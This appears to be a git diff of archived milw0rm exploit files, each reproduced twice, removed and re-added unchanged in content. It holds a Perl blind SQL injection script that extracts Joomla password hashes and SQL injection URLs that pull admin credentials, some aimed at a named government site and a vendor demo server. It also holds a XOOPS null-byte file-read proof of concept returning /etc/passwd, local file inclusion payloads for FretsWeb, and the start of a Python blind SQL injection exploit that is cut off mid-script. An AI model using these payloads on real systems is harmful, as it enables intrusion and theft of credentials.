-+++++++++++++++++++++++++++++++++++++++ -#[!] 
Produced in South America -+++++++++++++++++++++++++++++++++++++++ - -if you want to save the work, you can use the following script - -------------------------------- - -#!/usr/bin/perl -w - -use LWP::UserAgent; - - -print "\t\t-------------------------------------------------------------\n\n"; -print "\t\t | Chip d3 Bi0s | \n\n"; -print "\t\t Joomla Component com_jumi (fileid) Blind SQL-injection \n\n"; -print "\t\t-----------------------------------------------------------------\n\n"; - - - - -print "http://wwww.host.org/Path: "; -chomp(my $target=); -print " [-] Introduce fileid: "; -chomp($z=); - -print " [+] Password: "; - -$column_name="concat(password)"; -$table_name="jos_users"; - - -$b = LWP::UserAgent->new() or die "Could not initialize browser\n"; -$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); - - -for ($x=1;$x<=32;$x++) #x limit referido a la posicion del caracter -{ #c referido a ascci 48-57, 97-102 - - - - - for ($c=48;$c<=57;$c++) - -{ - $host = $target . "/index.php?option=com_jumi&fileid=".$z."'+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."/*"; - my $res = $b->request(HTTP::Request->new(GET=>$host)); - my $content = $res->content; - my $regexp = "com_"; -# print "limit:"; -# print "$x"; -# print "; assci:"; -# print "$c;"; - if ($content =~ /$regexp/) {$char=chr($c); print "$char";} - } - - - - - -for ($c=97;$c<=102;$c++) -{ - - - - $host = $target . 
"/index.php?option=com_jumi&fileid=".$z."'+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."/*"; - my $res = $b->request(HTTP::Request->new(GET=>$host)); - my $content = $res->content; - my $regexp = "com_"; -# print "limit:"; -# print "$x"; -# print "; assci:"; -# print "$c;"; - if ($content =~ /$regexp/) {$char=chr($c); print "$char";} - } - - -} - -# milw0rm.com [2009-06-15] +------------------------------------------------------------------------------ +Joomla Component com_jumi (fileid) Blind SQL-injection Vulnerability +------------------------------------------------------------------------------ + + + ##################################################### + # [+] Author : Chip D3 Bi0s # + # [+] Email : chipdebios[alt+64]gmail.com # + # [+] Vulnerability : Blind SQL injection # + ##################################################### + + + +Example: +http://localHost/path/index.php?option=com_jumi&fileid=n + +n=number fileid valid + +: +'+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1/* +'+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/* +/index.php?option=com_jumi&fileid=2'+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/* +etc, etc... + +DEMO LIVE: +http://www.elciudadano.gov.ec/index.php?option=com_jumi&fileid=2'+and+ascii(substring((SELECT+concat(username,0x3a,password)+from+jos_users+limit+0,1),1,1))=101/* + +etc, etc.... + ++++++++++++++++++++++++++++++++++++++++ +#[!] 
Produced in South America ++++++++++++++++++++++++++++++++++++++++ + +if you want to save the work, you can use the following script + +------------------------------- + +#!/usr/bin/perl -w + +use LWP::UserAgent; + + +print "\t\t-------------------------------------------------------------\n\n"; +print "\t\t | Chip d3 Bi0s | \n\n"; +print "\t\t Joomla Component com_jumi (fileid) Blind SQL-injection \n\n"; +print "\t\t-----------------------------------------------------------------\n\n"; + + + + +print "http://wwww.host.org/Path: "; +chomp(my $target=); +print " [-] Introduce fileid: "; +chomp($z=); + +print " [+] Password: "; + +$column_name="concat(password)"; +$table_name="jos_users"; + + +$b = LWP::UserAgent->new() or die "Could not initialize browser\n"; +$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); + + +for ($x=1;$x<=32;$x++) #x limit referido a la posicion del caracter +{ #c referido a ascci 48-57, 97-102 + + + + + for ($c=48;$c<=57;$c++) + +{ + $host = $target . "/index.php?option=com_jumi&fileid=".$z."'+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."/*"; + my $res = $b->request(HTTP::Request->new(GET=>$host)); + my $content = $res->content; + my $regexp = "com_"; +# print "limit:"; +# print "$x"; +# print "; assci:"; +# print "$c;"; + if ($content =~ /$regexp/) {$char=chr($c); print "$char";} + } + + + + + +for ($c=97;$c<=102;$c++) +{ + + + + $host = $target . "/index.php?option=com_jumi&fileid=".$z."'+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."/*"; + my $res = $b->request(HTTP::Request->new(GET=>$host)); + my $content = $res->content; + my $regexp = "com_"; +# print "limit:"; +# print "$x"; +# print "; assci:"; +# print "$c;"; + if ($content =~ /$regexp/) {$char=chr($c); print "$char";} + } + + +} + +# milw0rm.com [2009-06-15] diff --git a/platforms/php/webapps/8974.txt b/platforms/php/webapps/8974.txt index f87d226c4..cbe22be4c 100755 
--- a/platforms/php/webapps/8974.txt +++ b/platforms/php/webapps/8974.txt 
@@ -1,115 +1,114 @@ - - - ======================================================================== - XOOPS <= 2.3.3 Remote Arbitrary File Retrieval - ======================================================================== - - Affected Software : XOOPS <= 2.3.3 - Author : Luca "daath" De Fulgentis - daath[at]nibblesec[dot]org - Advisory number : NS-2009-01 - Advisory URL : http://blog.nibblesec.org/advisories/NS-2009-01.txt - Severity : Low/Medium - Local/Remote : Remote - - - [Summary] - - XOOPS is a web application platform written in PHP for the MySQL database. - Its object orientation makes it an ideal tool for developing small or large - community websites, intra company and corporate portals, weblogs and much - more. (Reference : http://www.xoops.org). - - Nibble Security discovered a remote arbitrary file retrieval in XOOPS version - 2.3.3, which could be exploited to read system or XOOPS configuration files - ("mainfile.php"). - - - [Vulnerability Details] - - A vulnerable read_file() function can be found in "module_icon.php" under - /xoops_lib/modules/protector/. Here an image icon is read and its full - pathname is constructed using a user-controllable variable called - "$mydirpath" : - - ============================================================================= - [...] - if( file_exists( $mydirpath.'/module_icon.png' ) ) { - $use_custom_icon = true ; - $icon_fullpath = $mydirpath.'/module_icon.png' ; - } else { - $use_custom_icon = false ; - $icon_fullpath = dirname(__FILE__).'/module_icon.png' ; - } - - [...] 
- } else { - - readfile( $icon_fullpath ) ; - } - ?> - ============================================================================= - - If register_globals is enabled and magic_quotes_gpc disabled, it's possible - to control the "$mydirpath" variable content and inject an arbitrary filename - (followed by a NULL byte (%00) to make file_exists() function ignore the - following "/module_icon.png"), resulting in file content inclusion in - application response. - - - [Proof of Concept Exploit] - - Some browsers (e.g. Mozilla Firefox) may refuse broken images (such as the - one generated by the vulnerable script). Bacause of this netcat/telnet can be - easily used to exploit this vulnerability : - - daath@shaytan:~$ echo -e "GET /xoops_lib/modules/protector/module_icon.php? - mydirpath=/etc/passwd%00 HTTP/1.0\n\n" | nc 127.0.0.1 80 - - HTTP/1.1 200 OK - Date: Mon, 16 Mar 2009 19:07:03 GMT - Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.1 with Suhosin-Patch - X-Powered-By: PHP/5.2.6-2ubuntu4.1 - Expires: Mon, 16 Mar 2009 21:00:00 +0100 - Cache-Control: public, max-age=3600 - Last-Modified: Mon, 16 Mar 2009 20:00:00 +0100 - Content-Length: 1661 - Connection: close - Content-Type: image/png - - root:x:0:0:root:/root:/bin/bash - daemon:x:1:1:daemon:/usr/sbin:/bin/sh - bin:x:2:2:bin:/bin:/bin/sh - [...] - daath@shaytan:~$ - - - [Time Table] - - 17/03/2009 - Vendor notified. - 17/03/2009 - Vendor response. - 28/05/2009 - Vendor re-contacted (no answer). - 16/06/2009 - Public disclosure. - - - [Legal Notices] - - The information in the advisory is believed to be accurate at the - time of publishing based on currently available information. - This information is provided as-is, as a free service to the community. - There are no warranties with regard to this information. - The author does not accept any liability for any direct, - indirect, or consequential loss or damage arising from use of, - or reliance on, this information. 
- Permission is hereby granted for the redistribution of this alert, - provided that the content is not altered in any way, except - reformatting, and that due credit is given. - - This vulnerability has been disclosed in accordance with the RFP - Full-Disclosure Policy v2.0, available at: - http://www.wiretrip.net/rfp/policy.html - - - -# Modules directory has an .htaccess file blocking php files from being accessed. Still the possibility is there. /str0ke - -# milw0rm.com [2009-06-16] + + ======================================================================== + XOOPS <= 2.3.3 Remote Arbitrary File Retrieval + ======================================================================== + + Affected Software : XOOPS <= 2.3.3 + Author : Luca "daath" De Fulgentis - daath[at]nibblesec[dot]org + Advisory number : NS-2009-01 + Advisory URL : http://blog.nibblesec.org/advisories/NS-2009-01.txt + Severity : Low/Medium + Local/Remote : Remote + + + [Summary] + + XOOPS is a web application platform written in PHP for the MySQL database. + Its object orientation makes it an ideal tool for developing small or large + community websites, intra company and corporate portals, weblogs and much + more. (Reference : http://www.xoops.org). + + Nibble Security discovered a remote arbitrary file retrieval in XOOPS version + 2.3.3, which could be exploited to read system or XOOPS configuration files + ("mainfile.php"). + + + [Vulnerability Details] + + A vulnerable read_file() function can be found in "module_icon.php" under + /xoops_lib/modules/protector/. Here an image icon is read and its full + pathname is constructed using a user-controllable variable called + "$mydirpath" : + + ============================================================================= + [...] 
+ if( file_exists( $mydirpath.'/module_icon.png' ) ) { + $use_custom_icon = true ; + $icon_fullpath = $mydirpath.'/module_icon.png' ; + } else { + $use_custom_icon = false ; + $icon_fullpath = dirname(__FILE__).'/module_icon.png' ; + } + + [...] + } else { + + readfile( $icon_fullpath ) ; + } + ?> + ============================================================================= + + If register_globals is enabled and magic_quotes_gpc disabled, it's possible + to control the "$mydirpath" variable content and inject an arbitrary filename + (followed by a NULL byte (%00) to make file_exists() function ignore the + following "/module_icon.png"), resulting in file content inclusion in + application response. + + + [Proof of Concept Exploit] + + Some browsers (e.g. Mozilla Firefox) may refuse broken images (such as the + one generated by the vulnerable script). Bacause of this netcat/telnet can be + easily used to exploit this vulnerability : + + daath@shaytan:~$ echo -e "GET /xoops_lib/modules/protector/module_icon.php? + mydirpath=/etc/passwd%00 HTTP/1.0\n\n" | nc 127.0.0.1 80 + + HTTP/1.1 200 OK + Date: Mon, 16 Mar 2009 19:07:03 GMT + Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.1 with Suhosin-Patch + X-Powered-By: PHP/5.2.6-2ubuntu4.1 + Expires: Mon, 16 Mar 2009 21:00:00 +0100 + Cache-Control: public, max-age=3600 + Last-Modified: Mon, 16 Mar 2009 20:00:00 +0100 + Content-Length: 1661 + Connection: close + Content-Type: image/png + + root:x:0:0:root:/root:/bin/bash + daemon:x:1:1:daemon:/usr/sbin:/bin/sh + bin:x:2:2:bin:/bin:/bin/sh + [...] + daath@shaytan:~$ + + + [Time Table] + + 17/03/2009 - Vendor notified. + 17/03/2009 - Vendor response. + 28/05/2009 - Vendor re-contacted (no answer). + 16/06/2009 - Public disclosure. + + + [Legal Notices] + + The information in the advisory is believed to be accurate at the + time of publishing based on currently available information. + This information is provided as-is, as a free service to the community. 
+ There are no warranties with regard to this information. + The author does not accept any liability for any direct, + indirect, or consequential loss or damage arising from use of, + or reliance on, this information. + Permission is hereby granted for the redistribution of this alert, + provided that the content is not altered in any way, except + reformatting, and that due credit is given. + + This vulnerability has been disclosed in accordance with the RFP + Full-Disclosure Policy v2.0, available at: + http://www.wiretrip.net/rfp/policy.html + + + +# Modules directory has an .htaccess file blocking php files from being accessed. Still the possibility is there. /str0ke + +# milw0rm.com [2009-06-16] diff --git a/platforms/php/webapps/8975.txt b/platforms/php/webapps/8975.txt index bc16cf0c0..342ed7627 100755 --- a/platforms/php/webapps/8975.txt +++ b/platforms/php/webapps/8975.txt 
@@ -1,19 +1,19 @@ - =-=-local file include-=-= - --=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-= -script: phpFK - PHP Forum -------------------------------------------------- -Author: ahmadbady -my site :Coming Soon -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -download from:http://www.frank-karau.de/download.php - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -xpl: -path/include/page_bottom.php?_FORUM[settings_design_style]={[(local_file)]}%00 - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-== --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=- - -# milw0rm.com [2009-06-17] + =-=-local file include-=-= + +-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-= +script: phpFK - PHP Forum +------------------------------------------------- +Author: ahmadbady +my site :Coming Soon +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +download from:http://www.frank-karau.de/download.php + +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +xpl: +path/include/page_bottom.php?_FORUM[settings_design_style]={[(local_file)]}%00 + +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-== +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=- + +# milw0rm.com [2009-06-17] diff --git a/platforms/php/webapps/8977.txt b/platforms/php/webapps/8977.txt index 9ce8f9d39..0d09a6e04 100755 --- a/platforms/php/webapps/8977.txt +++ b/platforms/php/webapps/8977.txt 
@@ -1,37 +1,37 @@ -############################ -# Author: n3wb0ss -# Date: 15/06/09 -# Contact: n3wboss@Safe-mail.net -############################ -# Software: TekBase All-in-One 3.1 -# Vendor: tekbase.de -# Example: http://demo.tekbase.de/ -# Vendor contacted: No -# Risk: High -############################ -# I found this website on a german board, looking for another script. -# Looks to me, like a Gameserver,TS-Server,Whatever-Server-Managing Script. No matter... -# It's vuln I found a lot more, but I decided to release just two examples to the public. -# U need accessdate, you can get them for demo on tekbase.de (Admin&Customer-Login) -############################ -# Here it is (adminaccess needed): -# Unfortunately I can't provide any sourcecode of this shit... it's closed source crap. But I think it should be easy to get it :P -# Have fun! -# POC: -http://demo.tekbase.de/admin.php?op=adminSupport&zahl=0&torder=&tcounter=15&ids=99991%27/**/unIon/**/Select/**/1,2,3,4,CONCAT(unhex(hex(TABLE_NAME))),6,7,8,9,10,11/**/frOM/**/INFORMATION_SCHEMA.COLUMNS/**/liMIT/**/-1/* - -############################ -# Second one( just be a member): -# POC: -http://demo.tekbase.de/members.php?op=membersBills&y=-2007%27/**/unION/**/SeleCT/**/1,TABLE_NAME,3,4,5,6,7,8/**/FroM/**/INFORMATION_SCHEMA.TABLES/* -http://demo.tekbase.de/members.php?op=membersBills&y=-2007%27/**/unION/**/SeleCT/**/1,group_concAT(admin,0x3a,password),3,4,5,6,7,8/**/FroM/**/teklab_admin/* - -############################ -# As said before, just 2 of many vulns -# -# -# H4ppy Gr33tinGs to the only On3 -# -########################### - -# milw0rm.com [2009-06-17] +############################ +# Author: n3wb0ss +# Date: 15/06/09 +# Contact: n3wboss@Safe-mail.net +############################ +# Software: TekBase All-in-One 3.1 +# Vendor: tekbase.de +# Example: http://demo.tekbase.de/ +# Vendor contacted: No +# Risk: High +############################ +# I found this website on a german board, looking for another 
script. +# Looks to me, like a Gameserver,TS-Server,Whatever-Server-Managing Script. No matter... +# It's vuln I found a lot more, but I decided to release just two examples to the public. +# U need accessdate, you can get them for demo on tekbase.de (Admin&Customer-Login) +############################ +# Here it is (adminaccess needed): +# Unfortunately I can't provide any sourcecode of this shit... it's closed source crap. But I think it should be easy to get it :P +# Have fun! +# POC: +http://demo.tekbase.de/admin.php?op=adminSupport&zahl=0&torder=&tcounter=15&ids=99991%27/**/unIon/**/Select/**/1,2,3,4,CONCAT(unhex(hex(TABLE_NAME))),6,7,8,9,10,11/**/frOM/**/INFORMATION_SCHEMA.COLUMNS/**/liMIT/**/-1/* + +############################ +# Second one( just be a member): +# POC: +http://demo.tekbase.de/members.php?op=membersBills&y=-2007%27/**/unION/**/SeleCT/**/1,TABLE_NAME,3,4,5,6,7,8/**/FroM/**/INFORMATION_SCHEMA.TABLES/* +http://demo.tekbase.de/members.php?op=membersBills&y=-2007%27/**/unION/**/SeleCT/**/1,group_concAT(admin,0x3a,password),3,4,5,6,7,8/**/FroM/**/teklab_admin/* + +############################ +# As said before, just 2 of many vulns +# +# +# H4ppy Gr33tinGs to the only On3 +# +########################### + +# milw0rm.com [2009-06-17] diff --git a/platforms/php/webapps/8978.txt b/platforms/php/webapps/8978.txt index 13f45d21c..3cd981950 100755 --- a/platforms/php/webapps/8978.txt +++ b/platforms/php/webapps/8978.txt 
@@ -1,78 +1,78 @@ -+------------------------------------------------------------------------+ -| fuzzylime cms <= 3.03a local inclusion / arbitrary file corruption poc | -+-----------+------------------------------------------------------------+ -| by staker | -+-----------+---------------------+ -| mail: staker[at]hotmail[dot]it | -| url: http://cms.fuzzylime.co.uk | -+---------------------------------+ - - -[1][LFI] - -http://[target]/[path]/code/confirm.php?e[]&list= { file + nullbyte } - -Vulnerable code: confirm.php (local file inclusion mq=off) ------------------------------------------------------------------ - 1. [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] ** -** || || || [] [][] [] [] [] [] [] [] [] [] [] [] ** -** [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] ** -** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ -**==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>-- -** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ - [> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> <][] [] ** -** ** -** ** -** ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O ** -** ¡PROUD TO BE SPANISH! ** -** ** -*********************************************************************************************** -*********************************************************************************************** - ----------------------------------------------------------------------------------------------- -| MULTIPLE LOCAL FILE INCLUSION VULNERABILITIES | -|--------------------------------------------------------------------------------------------| -| | FretsWeb 1.2 | | -| CMS INFORMATION: ------------------------ | -| | -|-->WEB: http://sourceforge.net/projects/fretsweb/ | -|-->DOWNLOAD: http://sourceforge.net/projects/fretsweb/ | -|-->DEMO: N/A | -|-->CATEGORY: CMS / Games/Entertainment | -|-->DESCRIPTION: Fretsweb is a Contest or Chart Server for Frets on Fire. It... 
| -| is an improved version of FoFCS.It is meant for... | -|-->RELEASED: 2009-05-30 | -| | -| CMS VULNERABILITY: | -| | -|-->TESTED ON: firefox 3 | -|-->DORK: N/A | -|-->CATEGORY: LOCAL FILE INCLUSION (LFI) / INSECURE COOKIE HANDLING (LFI) | -|-->AFFECT VERSION: CURRENT (MAYBE <= ?) | -|-->Discovered Bug date: 2009-06-02 | -|-->Reported Bug date: 2009-06-02 | -|-->Fixed bug date: 2009-06-14 | -|-->Info patch: http://sourceforge.net/projects/fretsweb/ | -|-->Author: YEnH4ckEr | -|-->mail: y3nh4ck3r[at]gmail[dot]com | -|-->WEB/BLOG: N/A | -|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. | -|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) | ----------------------------------------------------------------------------------------------- - - - -Note: Of course use null byte (%00) when you want to include a file with different extension to "php" - - - -########################### -/////////////////////////// - -LOCAL FILE INCLUSION (LFI): - -/////////////////////////// -########################### - - - -<<<<---------++++++++++++++ Condition: Nothing +++++++++++++++++--------->>>> - - - -[++] GET var --> 'language' - - - -~~~> http://[HOST]/[PATH]/charts.php?language=[LFI]%00 - - - -############################### -/////////////////////////////// - -INSECURE COOKIE HANDLING (LFI): - -/////////////////////////////// -############################### - - - -[++] Cookie --> 'fretsweb_language' - - - -~~~> fretsweb_language=[LFI]%00 - - - -<<<-----------------------------EOF---------------------------------->>>ENJOY IT! - - - - -############################################################################## -############################################################################## -##**************************************************************************## -## SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! 
## -##**************************************************************************## -##--------------------------------------------------------------------------## -##**************************************************************************## -## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!## -##**************************************************************************## -############################################################################## -############################################################################## - -# milw0rm.com [2009-06-17] +*********************************************************************************************** +*********************************************************************************************** +** ** +** ** +** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] ** +** || || || [] [][] [] [] [] [] [] [] [] [] [] [] ** +** [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] ** +** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ +**==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>-- +** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ + [> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> <][] [] ** +** ** +** ** +** ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O ** +** ¡PROUD TO BE SPANISH! 
** +** ** +*********************************************************************************************** +*********************************************************************************************** + +---------------------------------------------------------------------------------------------- +| MULTIPLE LOCAL FILE INCLUSION VULNERABILITIES | +|--------------------------------------------------------------------------------------------| +| | FretsWeb 1.2 | | +| CMS INFORMATION: ------------------------ | +| | +|-->WEB: http://sourceforge.net/projects/fretsweb/ | +|-->DOWNLOAD: http://sourceforge.net/projects/fretsweb/ | +|-->DEMO: N/A | +|-->CATEGORY: CMS / Games/Entertainment | +|-->DESCRIPTION: Fretsweb is a Contest or Chart Server for Frets on Fire. It... | +| is an improved version of FoFCS.It is meant for... | +|-->RELEASED: 2009-05-30 | +| | +| CMS VULNERABILITY: | +| | +|-->TESTED ON: firefox 3 | +|-->DORK: N/A | +|-->CATEGORY: LOCAL FILE INCLUSION (LFI) / INSECURE COOKIE HANDLING (LFI) | +|-->AFFECT VERSION: CURRENT (MAYBE <= ?) | +|-->Discovered Bug date: 2009-06-02 | +|-->Reported Bug date: 2009-06-02 | +|-->Fixed bug date: 2009-06-14 | +|-->Info patch: http://sourceforge.net/projects/fretsweb/ | +|-->Author: YEnH4ckEr | +|-->mail: y3nh4ck3r[at]gmail[dot]com | +|-->WEB/BLOG: N/A | +|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. | +|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) 
| +---------------------------------------------------------------------------------------------- + + + +Note: Of course use null byte (%00) when you want to include a file with different extension to "php" + + + +########################### +/////////////////////////// + +LOCAL FILE INCLUSION (LFI): + +/////////////////////////// +########################### + + + +<<<<---------++++++++++++++ Condition: Nothing +++++++++++++++++--------->>>> + + + +[++] GET var --> 'language' + + + +~~~> http://[HOST]/[PATH]/charts.php?language=[LFI]%00 + + + +############################### +/////////////////////////////// + +INSECURE COOKIE HANDLING (LFI): + +/////////////////////////////// +############################### + + + +[++] Cookie --> 'fretsweb_language' + + + +~~~> fretsweb_language=[LFI]%00 + + + +<<<-----------------------------EOF---------------------------------->>>ENJOY IT! + + + + +############################################################################## +############################################################################## +##**************************************************************************## +## SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! ## +##**************************************************************************## +##--------------------------------------------------------------------------## +##**************************************************************************## +## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!## +##**************************************************************************## +############################################################################## +############################################################################## + +# milw0rm.com [2009-06-17] diff --git a/platforms/php/webapps/8980.py b/platforms/php/webapps/8980.py index ccb8aa643..467027244 100755 --- a/platforms/php/webapps/8980.py +++ b/platforms/php/webapps/8980.py 
@@ -1,223 +1,223 @@ -#!/usr/bin/python -#*********************************************************************************************** -#*********************************************************************************************** -#** ** -#** ** -#** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] ** -#** || || || [] [][] [] [] [] [] [] [] [] [] [] [] ** -# [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] ** -#** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ -#**==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>-- -#** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ -# [> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> <][] [] -#** ** -#** ** -#** VIVA SPAIN!... GANAREMOS EL MUNDIAL!...o.O ** -#** PROUD TO BE SPANISH! ** -#** ** -#*********************************************************************************************** -#*********************************************************************************************** -# -#--------------------------------------------------------------------------------------------- -#| (GET var 'name') BLIND SQL INJECTION EXPLOIT | -#|-------------------------------------------------------------------------------------------| -#| | FretsWeb 1.2 | | -#| CMS INFORMATION: ------------------------ | -#| | -#|-->WEB: http://sourceforge.net/projects/fretsweb/ | -#|-->DOWNLOAD: http://sourceforge.net/projects/fretsweb/ | -#|-->DEMO: N/A | -#|-->CATEGORY: CMS / Games/Entertainment | -#|-->DESCRIPTION: Fretsweb is a Contest or Chart Server for Frets on Fire. It... | -#| is an improved version of FoFCS.It is meant for... | -#|-->RELEASED: 2009-05-30 | -#| | -#| CMS VULNERABILITY: | -#| | -#|-->TESTED ON: firefox 3 | -#|-->DORK: N/A | -#|-->CATEGORY: BLIND SQLi PYTHON EXPLOIT | -#|-->AFFECT VERSION: CURRENT (MAYBE <= ?) 
| -#|-->Discovered Bug date: 2009-06-02 | -#|-->Reported Bug date: 2009-06-02 | -#|-->Fixed bug date: 2009-06-14 | -#|-->Info patch: http://sourceforge.net/projects/fretsweb/ | -#|-->Author: YEnH4ckEr | -#|-->mail: y3nh4ck3r[at]gmail[dot]com | -#|-->WEB/BLOG: N/A | -#|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. | -#|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) | -#--------------------------------------------------------------------------------------------- -# -#------------ -#CONDITIONS: -#------------ -# -#magic quotes=OFF -# -#------- -#NEED: -#------- -# -#Valid name -# -#--------------------------------------- -#PROOF OF CONCEPT (SQL INJECTION): -#--------------------------------------- -# -#http://[HOST]/[PATH]/player.php?name=[valid_name]'+and+1=1%23 --> TRUE -#http://[HOST]/[PATH]/player.php?name=[valid_name]'+AND+1=0%23 --> FALSE -# -# -#http://[HOST]/[PATH]/song.php?hash=[valid_song]'+and+1=1%23 --> TRUE -#http://[HOST]/[PATH]/song.php?hash=[valid_song]'+and+1=0%23 --> FALSE -# -#-------------- -#WATCH VIDEOS -#-------------- -# -# BSQLi --> http://www.youtube.com/watch?v=BYrkuAN2ggI -# -# LFI --> http://www.youtube.com/watch?v=LZ8cG_sIHow -# -# -############################################################################## -############################################################################## -##**************************************************************************## -## SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! 
## -##**************************************************************************## -##--------------------------------------------------------------------------## -##**************************************************************************## -## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!## -##**************************************************************************## -############################################################################## -############################################################################## -# -#Used modules -import urllib,sys,re,os -#Defined functions -def init(): - if(sys.platform=='win32'): - os.system("cls") - os.system ("title FretsWeb 1.2 Blind SQL Injection Exploit") - os.system ("color 02") - else: - os.sytem("clear") - print "\t#######################################################\n\n" - print "\t#######################################################\n\n" - print "\t## FretsWeb 1.2 Blind SQL Injection Exploit ##\n\n" - print "\t## ++Conditions: magic_quotes=OFF ##\n\n" - print "\t## ++Needed: Valid name ##\n\n" - print "\t## Author: Y3nh4ck3r ##\n\n" - print "\t## Contact:y3nh4ck3r[at]gmail[dot]com ##\n\n" - print "\t## Proud to be Spanish! 
##\n\n" - print "\t#######################################################\n\n" - print "\t#######################################################\n\n" - -def request(urltarget): - conn=urllib.urlopen(urltarget) - outcode=conn.read() - #print outcode #--> Active this line for debugger mode - return outcode - -def error(): - print "\t------------------------------------------------------------\n" - print "\tWeb isn't vulnerable!\n\n" - print "\t--->Maybe:\n\n" - print "\t\t1.-Patched.\n" - print "\t\t2.-Bad path or host.\n" - print "\t\t3.-Bad name.\n" - print "\t\t4.-Magic quotes ON.\n" - print "\t\tEXPLOIT FAILED!\n" - print "\t------------------------------------------------------------\n" - sys.exit() - -def testedblindsql(): - print "\t-----------------------------------------------------------------\n" - print "\tWEB MAYBE BE VULNERABLE!\n\n" - print "\tTested Blind SQL Injection.\n" - print "\tStarting exploit...\n" - print "\t-----------------------------------------------------------------\n\n" - -def helper(filename): - print "\n\t[!!!] FretsWeb 1.2 Blind SQL Injection Exploit\n" - print "\t[!!!] USAGE MODE: [!!!]\n" - print "\t[!!!] python "+filename+" [HOST] [PATH] [NAME]\n" - print "\t[!!!] [HOST]: Web.\n" - print "\t[!!!] [PATH]: Home Path.\n" - print "\t[!!!] [NAME]: Name for fish\n" - print "\t[!!!] 
